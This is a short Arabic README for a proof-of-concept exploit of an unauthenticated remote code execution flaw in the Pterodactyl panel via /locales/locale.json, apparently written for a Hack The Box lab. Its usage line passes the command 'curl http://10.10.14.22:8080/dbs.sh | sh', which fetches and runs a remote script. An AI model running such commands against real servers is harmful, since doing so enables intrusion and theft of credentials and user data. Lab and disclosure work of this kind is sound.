
يسمح الثغرة للمهاجم بتنفيذ أوامر نظام تعسفية على الخادم الذي يستضيف لوحة Pterodactyl دون أي مصادقة مسبقة.
التأثير
باستخدام ملف /locales/locale.json مع معاملات الاستعلام locale و namespace، يمكن للمهاجم تنفيذ كود عشوائي دون الحاجة إلى المصادقة.
بفضل القدرة على تنفيذ كود عشوائي، يمكن استغلال هذه الثغرة بعدد لا حصر له من الطرق. يمكن استخدامها للحصول على وصول إلى خادم اللوحة، قراءة بيانات الاعتماد من إعدادات اللوحة (.env أو غير ذلك)، استخراج معلومات حساسة من قاعدة البيانات (مثل تفاصيل المستخدمين [اسم المستخدم، البريد الإلكتروني، الاسم الأول والأخير، كلمة المرور المشفرة، عناوين IP، إلخ])، الوصول إلى ملفات الخوادم المُدارة بواسطة اللوحة، إلخ.
كيفية الاستخدام
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'